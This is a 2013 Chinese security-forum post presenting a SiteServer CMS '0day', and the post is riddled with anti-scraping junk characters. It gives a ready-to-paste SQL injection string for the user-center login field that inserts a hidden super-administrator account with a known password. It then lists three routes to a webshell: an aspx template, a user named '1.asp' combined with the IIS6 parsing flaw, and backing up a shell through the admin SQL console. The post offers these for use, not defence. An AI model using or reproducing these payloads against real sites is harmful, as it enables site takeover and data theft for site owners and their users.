找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2146|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
经测试秒杀最新的3.5版
. D' Y. F8 f$ _5 n# B4 d' f- w2 o7 Z+ V( r  M) h2 K9 ]: G) j
stieserver官网:www.siteserver.cn; f! c7 z  f: Z5 y5 `  r! S

3 v$ y3 }/ @9 ?
; W+ y  W1 j$ N  `
4 Z: D* o" }8 O! n& ~$ GEXP:9 @2 E0 K" y- j4 ]
0 |6 R% k8 m4 q9 R& q" E) y2 c1 u
直接访问UserCenter/login.aspx" \) m  n+ V: w1 n& k+ d4 Q+ H* X

! f4 B" H# `+ o" c  s ; `5 x5 ~" k- m
9 P+ u. Z  h0 y& V, k4 N5 X$ m
用户名处输入:
; u( b4 U# E, {* r' N/ A' g8 @7 y
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: x* f% h" y; p8 {0 t/ }
  P' E, S: ^  u7 S ( ~( D) P* M+ q, e" R! Y; X
" g. L  O' S- v: }, q" r& }4 i5 |: X
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
$ q/ `+ m1 a5 d* Z# ]
% y1 ?( w6 i% a
# l% w' s: b& G
: h5 w9 ]' |% t( M之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 Q/ k1 @5 _  J# a. O3 l& G: D" L7 H; x1 t! ~
& k, a, l( G+ N  G

" W% E1 h* c9 i* z. ]后台拿webshell的三种方法:; i9 N% ?  g' U, m

% b9 B5 v. l! e# }一、. x# b0 ?' T/ ^9 u- k/ H. z2 V& W

6 u; T( S- \/ ?1 N, W站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx+ b, z. y! T) m, l3 X( m7 Q- u

  D6 N7 B4 n! ], g7 j! p二、
1 ?1 V8 p. H8 b  D/ r7 S  D! W9 X9 \; e. b: T1 l8 ~  z- R
成员权限-》添加用户-》用户名为:1.asp
0 x* r" J  T0 H' V, Y) H. m8 i, ~+ G9 R' K2 `
http://127.0.0.1/usercenter/
/ z% u& O5 t. n6 p
" l3 X, u( @5 b% z% L用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
$ V0 O( D2 e4 h7 T; N! o
: N* }7 e8 j1 H8 y3 T: O(ps:后台添加用户时不会验证是否含有非法字符)
9 V) V% K9 c2 ^: p5 F
+ j' X& S; j2 c0 ]! [2 G! f三、
' v; U* E2 O; I* N$ |0 \' f, f6 L& a) h9 B
系统工具-》实用工具-》机器参数查看2 }4 z2 N5 b0 s9 a$ c6 B# a* p. S
可以看到数据库类型、名称,WEB路径
  d# D9 @9 q1 R) R2 U$ o5 t% t4 S4 q6 J; m) b( Q: G7 J" w
系统工具-》数据库工具-》SQL语句查询
9 T' s5 p7 h$ n6 e1 V- g* D8 [这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。0 f7 k- @0 W* K: G6 _% }& v7 g
4 o7 U4 F/ H+ I; g/ P! P' o# U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表